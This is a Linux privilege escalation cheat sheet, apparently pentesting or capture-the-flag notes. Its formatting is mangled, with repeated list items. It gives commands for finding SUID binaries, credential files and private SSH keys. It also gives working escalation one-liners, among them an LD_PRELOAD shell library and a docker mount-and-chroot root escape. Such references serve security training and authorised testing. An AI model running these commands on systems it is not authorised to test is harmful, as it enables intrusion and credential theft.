-
SUID Binaries
- Find SUID Files:
find / -perm -4000 2>/dev/null - Exploits: Use GTFOBins for known SUID binary exploits.
- Find SUID Files:
-
sudo -l (Check Sudo Privileges)
- List Privileges:
sudo -l - Exploits: Look for
NOPASSWDor exploitable commands (e.g.,vim,find).
- List Privileges:
-
Cron Jobs
- View Cron Jobs:
cat /etc/crontab,ls -la /etc/cron.d/ - Exploits: Writable cron scripts or wildcard abuse.
- View Cron Jobs:
-
Writable /etc/passwd
- Exploit: Add new root user using password hash from
openssl passwd -1.
- Exploit: Add new root user using password hash from
-
SSH Keys
- Find Keys:
find / -name "*.pem" 2>/dev/null - Exploit: Use private key for SSH if no passphrase.
- Find Keys:
-
Kernel Exploits
- Check Kernel:
uname -r - Exploit: Search for exploits by kernel version on Exploit-DB.
- Check Kernel:
-
PATH Variable Manipulation
- Exploit: Modify
PATHand place malicious script in writable directory.
- Exploit: Modify
-
NFS Root Squashing
- Check: Look for
no_root_squashin/etc/exports - Exploit: Mount and access with root on NFS share.
- Check: Look for
-
World-Writable Files
- Find:
find / -writable -type d 2>/dev/null - Exploit: Overwrite world-writable scripts or binaries.
- Find:
-
LD_PRELOAD and LD_LIBRARY_PATH
- Exploit: Inject code with custom library.
gcc -fPIC -shared -o shell.so shell.c -nostartfiles LD_PRELOAD=./shell.so <vulnerable_program>
- Exploit: Inject code with custom library.
-
Docker Privilege Escalation
- Exploit: Mount root filesystem and escape container:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
- Exploit: Mount root filesystem and escape container:
-
Password and Credential Files
- Find Sensitive Files:
find / -name "*.bak" 2>/dev/null find / -name "*.old" 2>/dev/null grep -i "password" /path/to/directory
- Find Sensitive Files: